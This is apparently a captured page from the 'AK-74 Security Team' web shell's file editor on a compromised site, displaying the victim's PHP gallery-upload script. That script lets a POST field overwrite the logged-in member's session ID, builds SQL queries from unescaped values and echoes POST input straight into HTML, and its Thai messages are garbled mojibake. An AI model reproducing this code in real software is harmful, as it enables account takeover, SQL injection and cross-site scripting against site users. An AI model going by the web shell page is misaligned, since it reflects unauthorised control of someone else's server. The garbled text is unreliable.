AK-74 Security Team Web Shell

.:: :[ AK-74 Security Team Web-shell ]: ::.

Редактирование файла

<?php
include("../include/config.php");
include("../include/connect.php");
$startFunctionDefault = 'no';
include("../include/function.php");
header("Content-Type: text/html; charset=utf-8");
include("../include/blockMember.php");

if ($_POST['current_login_member_id'] != '') {
	$_SESSION['s_member_id'] = $_POST['current_login_member_id'];
}

function delGalleryImg($index) {
	$sql = "
		SELECT gallery_image
		FROM member
		WHERE member_id = '" . $_SESSION['s_member_id'] . "'
	";
	$query = sql_query($sql);
	$rec = sql_fetch_array($query);
	$gallery_image = $rec['gallery_image'];
	$a_image = explode('::', $gallery_image);
	
	if (@$a_image[$index] != '') {
		@unlink('../uploads/gallery_image/full/' . $a_image[$index]);
		@unlink('../uploads/gallery_image/thumb/' . $a_image[$index]);
		$a_image[$index] = '';
	} 
	return $a_image;
}

function displayGalleryImg($gallery_image){

$output = '';
	$a_image = explode('::', $gallery_image);
	if (count($a_image) > 0) {
	
		$output = '<table width="100%" border="0" cellspacing="0" cellpadding="0" id="tbl-gallery-image"><tr>';
		
		foreach ($a_image as $key => $img) {
				
			if ($img == '') {
				$srcImg = '/images/gender/color_14.gif';
				$text_del = '';
			} else { // end if ($img == '') {
				$srcImg = '/uploads/gallery_image/thumb/' . $img;
				$text_del = '<div onclick="delGallery(\'' . $key . '\')" style="cursor:pointer; color:#000000;">аёҐаёљ</div>';
			} // if ($img == '') {
		
			$output .= '<td style="padding:0 3px 0 0; text-align:center;" valign="top"><img src="' . $srcImg . '" id="gallery-image-' . $key . '" border="0">' . $text_del . '</td>';
		
		} // end foreach ($a_image as $key => $value) {
		
		$output .= '</td></tr></table>';
	
	} // end if (count($a_image) > 0) {
	return $output;

} // end function

if ( ($_FILES['gallery_image']['tmp_name'] <> '') && ($_POST['select_gallery_no'] != '') ) {

$aType = explode('.', $_FILES['gallery_image']['name']);
		$fileType = $aType[(count($aType)-1)];
		if ( ($fileType <> 'jpg') && ($fileType <> 'gif') && ($fileType <> 'png') ) {
			
			echo 'error::аёЈаё№аё›аё аёІаёћаё—аёµа№€аёаё™аёёаёЌаёІаё•аёґа№ѓаё«а№‰ upload а№„аё”а№‰аё„аё·аё .jpg, .png, .gif \nа№ЃаёҐаё°аё‚аё™аёІаё”а№„аёЎа№€а№ЂаёЃаёґаё™ ' . ($configMemberPostSize/1024) . ' Kb а№Ђаё—а№€аёІаё™аё±а№‰аё™';
			exit();
			
		} // end if ( ($fileType <> 'jpg') && ($fileType <> 'gif') && ($fileType <> 'png') ) {
		
		if ($_FILES['gallery_image']['size'] > $configMemberPostSize) {
		
			echo 'error::аёЈаё№аё›аё аёІаёћаё—аёµа№€аёаё™аёёаёЌаёІаё•аёґа№ѓаё«а№‰ upload а№„аё”а№‰аё„аё·аё .jpg, .png, .gif \nа№ЃаёҐаё°аё‚аё™аёІаё”а№„аёЎа№€а№ЂаёЃаёґаё™ ' . ($configMemberPostSize/1024) . ' Kb а№Ђаё—а№€аёІаё™аё±а№‰аё™';
			exit();
			
		} // end if ($_FILES['gallery_image']['size'] > $configMemberPostSize) {

$select_gallery_no = str_replace('gallery-image-', '', $_POST['select_gallery_no']);
		$a_image = array();
		$a_image = delGalleryImg($select_gallery_no);
		
		// full
		$input_file_path = '../uploads/gallery_image/full/';
		$aData = explode('.',$_FILES['gallery_image']['name']);
		$type = $aData[(count($aData)-1)];
		$input_file_name = check_file_in_path($type,$input_file_path,6);
		$width = $configGalleryImgFullWidth;
		$quality = 100;
		$actionFix = 'width';
		uploadfile2($input_file_path, $input_file_name, $_FILES['gallery_image']['tmp_name'], $width , $quality, $actionFix);
		
		// thumb
		$input_file_path = '../uploads/gallery_image/thumb/';
		$nw = $configGalleryImgThumbWidth;
		$nh = $configGalleryImgThumbHeight;
		$source = $_FILES['gallery_image']['tmp_name'];
		$stype = $type;
		$dest = $input_file_path . $input_file_name;
		cropImage($nw, $nh, $source, $stype, $dest);
		
		$a_image[$select_gallery_no] = $input_file_name;
		
		$gallery_image = implode('::', $a_image);
		$sql = "
			UPDATE member
			SET gallery_image = '" . $gallery_image . "'
			WHERE member_id = '" . $_SESSION['s_member_id'] . "'
		";
		sql_query($sql);
		echo 'ok::' . displayGalleryImg($gallery_image);
		exit();
	
} // end if ( ($_FILES['gallery_image']['tmp_name'] <> '') && ($_POST['select_gallery_no'] != '') ) {

if ($_POST['delId'] != '') {

$a_image = array();
	$a_image = delGalleryImg($_POST['delId']);
	$gallery_image = implode('::', $a_image);
	$sql = "
		UPDATE member
		SET gallery_image = '" . $gallery_image . "'
		WHERE member_id = '" . $_SESSION['s_member_id'] . "'
	";
	sql_query($sql);
	echo 'ok::' . displayGalleryImg($gallery_image);

} // end if ($_POST['delId'] != '') {

if ($_POST['getDisplayGallery'] != '') {
	$gallery_image = $_POST['getDisplayGallery'];
	echo displayGalleryImg($gallery_image);
}

Rename: -